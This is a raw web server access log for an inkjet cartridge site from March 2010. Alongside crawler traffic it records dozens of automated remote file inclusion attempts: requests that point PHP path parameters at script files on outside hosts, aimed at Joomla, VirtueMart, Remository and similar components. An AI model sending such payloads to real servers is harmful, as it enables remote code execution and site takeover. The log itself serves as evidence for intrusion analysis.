122.200.203.11 - - [01/Mar/2010:02:33:30 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:02:34:23 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:02:34:23 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:02:35:44 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:02:35:44 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:02:35:44 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:02:36:21 -0800] "GET /phpbb/viewtopic.php?t=155 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
122.200.203.11 - - [01/Mar/2010:02:43:30 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:03:02:55 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:03:02:55 -0800] "GET //write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:03:02:55 -0800] "GET /logs///write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:03:04:07 -0800] "GET /phpbb/viewtopic.php?t=638 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
219.240.39.222 - - [01/Mar/2010:03:07:56 -0800] "GET /include/lib.inc.php?site_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.240.39.222 - - [01/Mar/2010:03:07:56 -0800] "GET /logs//include/lib.inc.php?site_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.240.39.222 - - [01/Mar/2010:03:09:19 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
184.73.23.37 - - [01/Mar/2010:03:33:01 -0800] "GET / HTTP/1.0" 200 2116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:03:33:51 -0800] "GET /phpbb/viewtopic.php?t=335 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:03:41:13 -0800] "GET /phpbb/viewtopic.php?p=2579 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:03:42:02 -0800] "GET /phpbb/viewtopic.php?p=3210 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:03:56:24 -0800] "GET /links/links25.html HTTP/1.0" 200 30326 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:04:11:25 -0800] "GET /phpbb/viewtopic.php?p=3125 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:04:13:39 -0800] "GET /phpbb/viewtopic.php?t=120 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:04:15:34 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:04:15:34 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:04:15:34 -0800] "GET /logs/scripts.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:04:28:31 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:04:28:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:04:28:31 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:04:45:45 -0800] "GET /phpbb/viewtopic.php?t=423 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.199.46 - - [01/Mar/2010:04:46:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:04:49:51 -0800] "GET /phpbb/viewtopic.php?p=368 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
211.189.18.93 - - [01/Mar/2010:04:54:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.189.18.93 - - [01/Mar/2010:04:54:28 -0800] "GET /logs/access_100101.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.189.18.93 - - [01/Mar/2010:04:54:28 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:04:55:57 -0800] "GET /logs///vwar/backup/errors.php?error=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:04:55:57 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:04:55:57 -0800] "GET //vwar/backup/errors.php?error=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.46 - - [01/Mar/2010:04:56:12 -0800] "GET /blog1/ HTTP/1.1" 200 6233 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
89.149.244.84 - - [01/Mar/2010:04:56:29 -0800] "GET /phpbb/posting.php?mode=reply&t=176 HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/viewtopic.php?t=176&start=300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
95.81.223.54 - - [01/Mar/2010:04:56:30 -0800] "POST /phpbb/posting.php HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:05:02:14 -0800] "GET /phpbb/viewtopic.php?t=1910&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:04:46 -0800] "GET /errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:04:47 -0800] "GET /logs//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:04:49 -0800] "GET /logs/scripts.log//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:05:59 -0800] "GET /logs/scripts.log%20%20//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:08:49 -0800] "GET /logs//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:08:49 -0800] "GET /errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:08:49 -0800] "GET /logs/scripts.log//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [01/Mar/2010:05:10:46 -0800] "GET /logs/access.log//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [01/Mar/2010:05:10:46 -0800] "GET /logs//export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [01/Mar/2010:05:10:46 -0800] "GET /export.php?mosConfig_absolute_path=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:13:07 -0800] "GET /logs//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:13:07 -0800] "GET /logs/scripts.log//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:13:07 -0800] "GET /errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:14:51 -0800] "GET /logs/scripts.log%20%20//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:05:16:25 -0800] "GET /phpbb/viewtopic.php?t=1563&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:17:29 -0800] "GET /errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:17:29 -0800] "GET /logs/scripts.log//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:17:29 -0800] "GET /logs//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:23:12 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:23:12 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:23:12 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:23:59 -0800] "GET /logs/scripts.log%20%20//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:05:25:03 -0800] "GET /phpbb/viewtopic.php?t=4168 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:05:29:41 -0800] "GET /phpbb/viewtopic.php?t=18 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:29:56 -0800] "GET /logs/scripts.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
98.198.66.43 - - [01/Mar/2010:05:30:49 -0800] "GET /email/images/inkmail21_02.gif HTTP/1.1" 200 15159 "http://webmail.myway.com/b644fe83/gds/index_rich.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; msn OptimizedIE8;ENUS)" "site.inkjetcartridge.com"
98.198.66.43 - - [01/Mar/2010:05:30:50 -0800] "GET /email/images/inkmail21_04.gif HTTP/1.1" 200 15283 "http://webmail.myway.com/b644fe83/gds/index_rich.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; msn OptimizedIE8;ENUS)" "site.inkjetcartridge.com"
98.198.66.43 - - [01/Mar/2010:05:30:50 -0800] "GET /email/images/inkmail21_05.gif HTTP/1.1" 200 15725 "http://webmail.myway.com/b644fe83/gds/index_rich.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; msn OptimizedIE8;ENUS)" "site.inkjetcartridge.com"
98.198.66.43 - - [01/Mar/2010:05:30:50 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "http://webmail.myway.com/b644fe83/gds/index_rich.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; msn OptimizedIE8;ENUS)" "site.inkjetcartridge.com"
98.198.66.43 - - [01/Mar/2010:05:30:50 -0800] "GET /email/images/inkmail21_03.gif HTTP/1.1" 200 16134 "http://webmail.myway.com/b644fe83/gds/index_rich.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; msn OptimizedIE8;ENUS)" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:05:31:55 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:05:33:56 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:05:33:56 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:05:34:23 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:05:35:42 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:05:35:42 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
121.254.214.60 - - [01/Mar/2010:05:36:10 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:05:39:32 -0800] "GET /phpbb/viewtopic.php?p=899 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:05:57:13 -0800] "GET /logs/scripts.log%20%20//errors.php?error=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:05:57:33 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:05:57:33 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:05:57:33 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:05:57:41 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:05:57:41 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.25.16 - - [01/Mar/2010:05:57:41 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:05:58:38 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:05:59:03 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:06:01:06 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:06:03:50 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:06:03:50 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:06:03:58 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:06:04:06 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:06:04:07 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:06:04:33 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:06:05:57 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
207.46.195.239 - - [01/Mar/2010:06:09:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
204.16.2.161 - - [01/Mar/2010:06:09:49 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "site.inkjetcartridge.com"
204.16.2.161 - - [01/Mar/2010:06:09:49 -0800] "GET /logs/scripts.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "site.inkjetcartridge.com"
204.16.2.161 - - [01/Mar/2010:06:09:50 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "site.inkjetcartridge.com"
204.16.2.161 - - [01/Mar/2010:06:09:52 -0800] "GET /logs/scripts.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "site.inkjetcartridge.com"
204.16.2.161 - - [01/Mar/2010:06:09:52 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "site.inkjetcartridge.com"
204.16.2.161 - - [01/Mar/2010:06:09:52 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:06:10:05 -0800] "GET /logs///nullpo/hsList.php?subdir=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:06:10:30 -0800] "GET /logs///nullpo/hsList.php?subdir=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
221.141.1.113 - - [01/Mar/2010:06:10:39 -0800] "GET /logs///nullpo/hsList.php?subdir=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
207.46.195.239 - - [01/Mar/2010:06:10:43 -0800] "GET /images/?S=A HTTP/1.1" 200 90945 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
208.120.228.43 - - [01/Mar/2010:06:10:51 -0800] "GET /phpbb/index.php HTTP/1.0" 200 517 "http://site.inkjetcartridge.com/phpbb/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
